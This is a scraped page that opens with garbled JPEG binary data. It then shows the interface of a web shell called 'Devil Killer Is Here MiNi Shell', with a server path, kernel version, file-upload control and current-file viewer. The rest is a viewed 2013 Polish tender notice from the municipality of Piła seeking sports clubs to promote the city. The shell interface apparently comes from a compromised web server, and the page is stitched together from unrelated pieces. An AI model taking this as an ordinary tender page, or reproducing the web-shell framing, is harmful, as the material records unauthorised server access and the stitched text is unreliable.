JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130308/36165-N-2013.html

<p class="kh_header"><b>Piła: zad.nr 1 - Promocja miasta w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie koszykówka 
zad.nr 2 - Promocja miasta w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie piłka siatkowa kobiet
zad.nr 3 - Promocja miasta w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie piłka nożna
zad.nr 4 - Promocja miasta w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie żużel</b><br>
<b>Numer ogłoszenia: 36165 - 2013; data zamieszczenia: 08.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piła , Pl. Staszica 10, 64-920 Piła, woj. wielkopolskie, tel. 067 2126210, faks 067 2123566.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zad.nr 1 - Promocja miasta w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie koszykówka 
zad.nr 2 - Promocja miasta w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie piłka siatkowa kobiet
zad.nr 3 - Promocja miasta w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie piłka nożna
zad.nr 4 - Promocja miasta w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie żużel.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> zad.nr 1 - Promocja miasta w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie koszykówka 
zad.nr 2 - Promocja miasta w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie piłka siatkowa kobiet
zad.nr 3 - Promocja miasta w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie piłka nożna
zad.nr 4 - Promocja miasta w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie żużel
Wykonawca zobowiązuje się do promocji miasta poprzez:
1. Ekspozycję znaku promocyjnego miasta Piły oraz haseł promocyjnych (określonych  w załączniku nr 2) ,  na dwóch banerach o wymiarach co najmniej 3,40x1,00 m     podczas i po zakończeniu zawodów rozgrywanych w Pile.
 2. Zapewnienie dobrej widoczności znaku i haseł (określonych w załączniku nr 2) w trakcie transmisji oraz relacji telewizyjnych, w tym: w  trakcie wywiadów z trenerami, zawodnikami, działaczami sportowymi oraz zaproszonymi gośćmi.
3. Ekspozycję znaku promocyjnego  miasta Piły (określonego w załączniku nr 2) na strojach zawodników i kadry szkoleniowej w czasie meczów w Pile i na wyjeździe.
4. Umieszczenie na stronie internetowej Wykonawcy znaku promocyjnego miasta Piły (określonego w załączniku nr 2) wśród sponsorów oraz linku na stronę internetową miasta www.pila.pl
5. Ekspozycję znaku promocyjnego miasta Piły (określonego w załączniku nr 2) na materiałach reklamowych, informacyjnych Wykonawcy (  programy zawodów, plakaty, bilety, inne).
6. Przygotowanie i emisję reklamy dźwiękowej  miasta w przerwach meczów  o treści (wraz z podkładem muzycznym):      Piła - Aktywne miasto - zapraszamy na imprezy organizowane przez Urząd    Miasta Piły -  informacje na stronie www.pila.pl
7. Wykonanie 1 szt. roll-up ze znakiem promocyjnym miasta, zgodnie z załącznikiem nr 2.
8. Zorganizowanie jednej otwartej całodniowej  imprezy sportowo-rekreacyjnej  w formie festynu dla mieszkańców miasta pod hasłem:
zad. nr 1 - Piła pod koszem,
zad. Nr 2 - Piła pod siatką,
zad. nr 3 -Piła  pod bramką,
zad. nr 4 -Piła na plastronie,
z następującym programem:
    - popularyzacja określonej w zadaniu dyscypliny sportu,
    - spotkanie z drużyną,
  - akcja  - Otwarte drzwi dla mieszkańców miasta - wizyta w siedzibie klubu lub w obiekcie   sportowym, gdzie są rozgrywane są zawody sportowe.
9. Inne warunki realizacji zadania
- dopuszcza się płatności częściowe,
- wysokość całkowitego wynagrodzenia za realizację przedmiotu umowy ustala się jako sumę wynagrodzeń miesięcznych brutto w poszczególnych miesiącach realizacji zadania, wynagrodzenie  za wykonanie przedmiotu umowy zostanie zapłacone Wykonawcy raz w miesiącu, zgodnie z przeprowadzoną promocją miasta w miesiącu poprzedzającym wystawienie faktury, w terminie 14 dni od daty przyjęcia przez Zamawiającego poprawnie wystawionej faktury VAT z dołączonym sprawozdaniem z przeprowadzonej promocji, które zawiera:
- informację o odbytych spotkaniach, miejscach i terminach zawodów sportowych,
- ilości dokumentację fotograficzną,
- materiały reklamowe (plakaty, bilety, programy zawodów sportowych).

Każde zadanie stanowi oddzielny przedmiot zamówienia.kibiców,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.62.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają licencje na występowanie w rozgrywkach w 2013 roku;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) oświadczenia o treści określonej w art.  22 ust. 1 ustawy Prawo zamówień publicznych - załącznik nr 2
2) Wypełniona wycena działań promocyjnych - załącznik nr 5
3) Pełnomocnictwo do reprezentowania w postępowaniu, (w przypadku podmiotów występujących wspólnie) - przygotowane zgodnie z zapisami części VII pkt. 4 SIWZ.
4)Parafowany projekt umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2013 godzina 09:00, miejsce: Urząd Miasta Piły pl. Staszica 10 p. 134.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Promocja miasta Piły w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie koszykówka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się do promocji miasta Piły poprzez:
1. Ekspozycję znaku promocyjnego miasta Piły oraz haseł promocyjnych (określonych w załączniku nr 2),  na dwóch banerach o wymiarach co najmniej 3,40x1,00 m podczas i po    zakończeniu zawodów rozgrywanych w Pile.
 2. Zapewnienie dobrej widoczności znaku i haseł (określonych w załączniku nr 2) w trakcie transmisji oraz relacji telewizyjnych, w tym: w  trakcie wywiadów z trenerami, zawodnikami, działaczami sportowymi oraz zaproszonymi gośćmi.
3. Ekspozycję znaku promocyjnego  miasta Piły (określonego w załączniku nr 2) na strojach zawodników i kadry szkoleniowej w czasie meczów w Pile i na wyjeździe.
4. Umieszczenie na stronie internetowej Wykonawcy znaku promocyjnego miasta Piły (określonego w załączniku nr 2) wśród sponsorów oraz linku na stronę internetową miasta www.pila.pl
5. Ekspozycję znaku promocyjnego miasta Piły (określonego w załączniku nr 2) na materiałach reklamowych, informacyjnych Wykonawcy (  programy zawodów, plakaty, bilety, inne).
6. Przygotowanie i emisję reklamy dźwiękowej  miasta w przerwach meczów  o treści 
(wraz z podkładem muzycznym):      Piła - Aktywne miasto - zapraszamy na imprezy organizowane przez Urząd     Miasta Piły -  informacje na stronie www.pila.pl
7. Wykonanie 1 szt. roll-up ze znakiem promocyjnym miasta, zgodnie z załącznikiem nr 2.
8. Zorganizowanie jednej otwartej całodniowej  imprezy sportowo-rekreacyjnej  w formie festynu dla mieszkańców miasta pod hasłem  -Piła pod koszem,
z następującym programem:
        - popularyzacja określonej w zadaniu dyscypliny sportu,
        - spotkanie z drużyną,
   - akcja  -Otwarte drzwi dla mieszkańców miasta - wizyta w siedzibie klubu lub w obiekcie sportowym, gdzie są rozgrywane są zawody sportowe.
9. Inne warunki realizacji zadania
dopuszcza się płatności częściowe,
wysokość całkowitego wynagrodzenia za realizację przedmiotu umowy ustala się jako sumę wynagrodzeń miesięcznych brutto w poszczególnych miesiącach realizacji zadania,
wynagrodzenie  za wykonanie przedmiotu umowy zostanie zapłacone Wykonawcy raz 
w miesiącu, zgodnie z przeprowadzoną promocją miasta w miesiącu poprzedzającym wystawienie faktury, w terminie 14 dni od daty przyjęcia przez Zamawiającego poprawnie wystawionej faktury VAT z dołączonym sprawozdaniem z przeprowadzonej promocji, które zawiera:
informację o odbytych spotkaniach, miejscach i terminach zawodów sportowych, ilości kibiców, 
dokumentację fotograficzną,
materiały reklamowe (plakaty, bilety, programy zawodów sportowych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.62.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Promocja miasta Piły w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie piłka siatkowa kobiet.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się do promocji miasta Piły poprzez:
1. Ekspozycję znaku promocyjnego miasta Piły oraz haseł promocyjnych (określonych w załączniku nr 2),  na dwóch banerach o wymiarach co najmniej 3,40x1,00 m podczas i po    zakończeniu zawodów rozgrywanych w Pile.
 2. Zapewnienie dobrej widoczności znaku i haseł (określonych w załączniku nr 2) w trakcie transmisji oraz relacji telewizyjnych, w tym: w  trakcie wywiadów z trenerami, zawodnikami, działaczami sportowymi oraz zaproszonymi gośćmi.
3. Ekspozycję znaku promocyjnego  miasta Piły (określonego w załączniku nr 2) na strojach zawodników i kadry szkoleniowej w czasie meczów w Pile i na wyjeździe.
4. Umieszczenie na stronie internetowej Wykonawcy znaku promocyjnego miasta Piły (określonego w załączniku nr 2) wśród sponsorów oraz linku na stronę internetową miasta www.pila.pl
5. Ekspozycję znaku promocyjnego miasta Piły (określonego w załączniku nr 2) na materiałach reklamowych, informacyjnych Wykonawcy (  programy zawodów, plakaty, bilety, inne).
6. Przygotowanie i emisję reklamy dźwiękowej  miasta w przerwach meczów  o treści 
(wraz z podkładem muzycznym):      Piła - Aktywne miasto - zapraszamy na imprezy organizowane przez Urząd     Miasta Piły -  informacje na stronie www.pila.pl
7. Wykonanie 1 szt. roll-up ze znakiem promocyjnym miasta, zgodnie z załącznikiem nr 2.
8. Zorganizowanie jednej otwartej całodniowej  imprezy sportowo-rekreacyjnej  w formie festynu dla mieszkańców miasta pod hasłem  Piła pod siatką,
z następującym programem:
        - popularyzacja określonej w zadaniu dyscypliny sportu,
        - spotkanie z drużyną,
   - akcja -Otwarte drzwi dla mieszkańców miasta - wizyta w siedzibie klubu lub w obiekcie sportowym, gdzie są rozgrywane są zawody sportowe.
9. Inne warunki realizacji zadania
dopuszcza się płatności częściowe,
wysokość całkowitego wynagrodzenia za realizację przedmiotu umowy ustala się jako sumę wynagrodzeń miesięcznych brutto w poszczególnych miesiącach realizacji zadania,
wynagrodzenie  za wykonanie przedmiotu umowy zostanie zapłacone Wykonawcy raz 
w miesiącu, zgodnie z przeprowadzoną promocją miasta w miesiącu poprzedzającym wystawienie faktury, w terminie 14 dni od daty przyjęcia przez Zamawiającego poprawnie wystawionej faktury VAT z dołączonym sprawozdaniem z przeprowadzonej promocji, które zawiera:
informację o odbytych spotkaniach, miejscach i terminach zawodów sportowych, ilości kibiców, 
dokumentację fotograficzną,
materiały reklamowe (plakaty, bilety, programy zawodów sportowych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.62.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Promocja miasta Piły w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie piłka nożna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się do promocji miasta Piły poprzez:
1. Ekspozycję znaku promocyjnego miasta Piły oraz haseł promocyjnych (określonych w załączniku nr 2),  na dwóch banerach o wymiarach co najmniej 3,40x1,00 m podczas i po    zakończeniu zawodów rozgrywanych w Pile.
 2. Zapewnienie dobrej widoczności znaku i haseł (określonych w załączniku nr 2) w trakcie transmisji oraz relacji telewizyjnych, w tym: w  trakcie wywiadów z trenerami, zawodnikami, działaczami sportowymi oraz zaproszonymi gośćmi.
3. Ekspozycję znaku promocyjnego  miasta Piły (określonego w załączniku nr 2) na strojach zawodników i kadry szkoleniowej w czasie meczów w Pile i na wyjeździe.
4. Umieszczenie na stronie internetowej Wykonawcy znaku promocyjnego miasta Piły (określonego w załączniku nr 2) wśród sponsorów oraz linku na stronę internetową miasta www.pila.pl
5. Ekspozycję znaku promocyjnego miasta Piły (określonego w załączniku nr 2) na materiałach reklamowych, informacyjnych Wykonawcy (  programy zawodów, plakaty, bilety, inne).
6. Przygotowanie i emisję reklamy dźwiękowej  miasta w przerwach meczów  o treści 
(wraz z podkładem muzycznym):      Piła - Aktywne miasto - zapraszamy na imprezy organizowane przez Urząd     Miasta Piły -  informacje na stronie www.pila.pl
7. Wykonanie 1 szt. roll-up ze znakiem promocyjnym miasta, zgodnie z załącznikiem nr 2.
8. Zorganizowanie jednej otwartej całodniowej  imprezy sportowo-rekreacyjnej  w formie festynu dla mieszkańców miasta pod hasłem  -Piła pod bramką,
z następującym programem:
        - popularyzacja określonej w zadaniu dyscypliny sportu,
        - spotkanie z drużyną,
   - akcja  Otwarte drzwi dla mieszkańców miasta - wizyta w siedzibie klubu lub w obiekcie sportowym, gdzie są rozgrywane są zawody sportowe.
9. Inne warunki realizacji zadania
dopuszcza się płatności częściowe,
wysokość całkowitego wynagrodzenia za realizację przedmiotu umowy ustala się jako sumę wynagrodzeń miesięcznych brutto w poszczególnych miesiącach realizacji zadania,
wynagrodzenie  za wykonanie przedmiotu umowy zostanie zapłacone Wykonawcy raz 
w miesiącu, zgodnie z przeprowadzoną promocją miasta w miesiącu poprzedzającym wystawienie faktury, w terminie 14 dni od daty przyjęcia przez Zamawiającego poprawnie wystawionej faktury VAT z dołączonym sprawozdaniem z przeprowadzonej promocji, które zawiera:
informację o odbytych spotkaniach, miejscach i terminach zawodów sportowych, ilości kibiców, 
dokumentację fotograficzną,
materiały reklamowe (plakaty, bilety, programy zawodów sportowych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.62.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Promocja miasta Piły w roku 2013 w ramach prowadzonej działalności sportowej w dyscyplinie żużel.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się do promocji miasta Piły poprzez:
1. Ekspozycję znaku promocyjnego miasta Piły oraz haseł promocyjnych (określonych w załączniku nr 2),  na dwóch banerach o wymiarach co najmniej 3,40x1,00 m podczas i po    zakończeniu zawodów rozgrywanych w Pile.
 2. Zapewnienie dobrej widoczności znaku i haseł (określonych w załączniku nr 2) w trakcie transmisji oraz relacji telewizyjnych, w tym: w  trakcie wywiadów z trenerami, zawodnikami, działaczami sportowymi oraz zaproszonymi gośćmi.
3. Ekspozycję znaku promocyjnego  miasta Piły (określonego w załączniku nr 2) na strojach zawodników i kadry szkoleniowej w czasie meczów w Pile i na wyjeździe.
4. Umieszczenie na stronie internetowej Wykonawcy znaku promocyjnego miasta Piły (określonego w załączniku nr 2) wśród sponsorów oraz linku na stronę internetową miasta www.pila.pl
5. Ekspozycję znaku promocyjnego miasta Piły (określonego w załączniku nr 2) na materiałach reklamowych, informacyjnych Wykonawcy (  programy zawodów, plakaty, bilety, inne).
